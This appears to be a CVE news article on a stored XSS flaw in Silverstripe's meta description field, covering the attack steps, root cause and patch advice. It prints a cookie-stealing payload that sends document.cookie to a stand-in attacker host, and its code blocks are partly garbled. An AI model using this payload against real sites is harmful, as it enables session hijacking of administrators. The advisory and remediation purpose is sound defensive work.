CVE CyberSecurity Database News

CVE-2022-38145 - Exploiting XSS in Silverstripe’s Meta Description (With Example Payload & Fixes)

Poster -

---

Introduction

A critical security flaw was discovered in Silverstripe silverstripe/framework (up to and including 4.11) tracked as CVE-2022-38145. This vulnerability lets attackers inject malicious JavaScript code into a page’s meta description. When admins or editors use the “versioned history compare view” feature, this code executes right in their browser—opening the door for account hijacking, data theft, and more.

Below, we’ll break down what’s vulnerable, show you a code example of an attack, and give you practical advice to fix or test it. Everything is written in plain language for easy understanding.

What is Silverstripe and Why This Matters

Silverstripe is a popular content management system (CMS) used to build and manage websites. The framework helps manage content versions, letting website admins see what changed between different versions of a page using a “history compare” view. Unfortunately, this is where the problem lies.

If a page’s meta description field contains a JavaScript script, that code is not always properly escaped. This means it can run in the browser of anyone viewing the history comparison. This is a classic cross-site scripting (XSS) vulnerability.

How the Vulnerability Works

1. Attacker submits a crafted meta description: Normally, descriptions are just plain text for SEO. But a hacker can inject JavaScript code instead.
2. Code gets stored: Silverstripe saves this new meta description, making it part of the page’s history.
3. Admin opens version history: An admin/editor reviews changes using Silverstripe’s “versioned history compare view.”
4. XSS fires: If the compare view fails to escape the meta description, the attacker’s script runs in the admin’s browser. This can steal cookies, hijack sessions, or do almost anything the admin can.

`html

alert('Owned!');


- This change saves. Later, an admin opens the page’s “history compare view.”
- BAM! Their browser pops up an alert saying “Owned!”—but real hackers could run much worse code.

---

PoC: Live Code Example

Assuming you (or your organization) use Silverstripe 4.11 or earlier, here’s what an attack might look like.

1. Edit Page Meta Description as Attacker

   Go to any editable page, and if possible, update the Meta Description field with:

html
fetch('<a href="https://evil.example.com/?cookie='+document.cookie" rel="nofollow">https://evil.example.com/?cookie='+document.cookie</a>)

Trigger the Attack

Admin (or another privileged user) logs in and uses the Silverstripe “Compare versions” view for that page. Suddenly, the browser runs the injected script!

Technical Root Cause

The compare view in Silverstripe’s CMS doesn’t escape or sanitize meta data fields like “Meta Description” before rendering them as HTML. Normally, anything coming from users—especially if it could end up in HTML—needs to be properly escaped or filtered. Skipping this step lets attackers directly insert <script> blocks or event handlers.

See the official GitHub commit fixing this.

Exploitable Paths (Where Attackers Strike)

- Any public or low-privileged user who can add or edit pages, especially via import features, APIs, or even comment fields (if not locked down), could inject malicious meta descriptions.

Potential Damage

- Stealing admin cookies/sessions (session hijack)

Update Silverstripe!

Patch to at least Framework 4.12 or the version in the official security advisory.

Escape Output:

Until you can update, make sure all fields—especially MetaDescription—are escaped in any templates and views:

Sanitize Inputs:

Backend / Model-level validation should strip or reject script tags or HTML in descriptions.

References & Further Reading

- NVD Entry for CVE-2022-38145
- Silverstripe Security Advisory
- Fix Commit on GitHub
- Silverstripe 4.12 Changelog

Conclusion

CVE-2022-38145 is a real risk for anyone running Silverstripe up to version 4.11. If you’re responsible for a Silverstripe site, act now: patch, sanitize, and don’t leave your admins exposed!

Exploiting this bug takes zero special tools—just a clever edit and a patient attacker. Always treat any user-editable field as potentially dangerous, especially if it ever gets rendered as HTML.

Timeline

Published on: 11/23/2022 02:15:00 UTC
Last modified on: 11/30/2022 14:24:00 UTC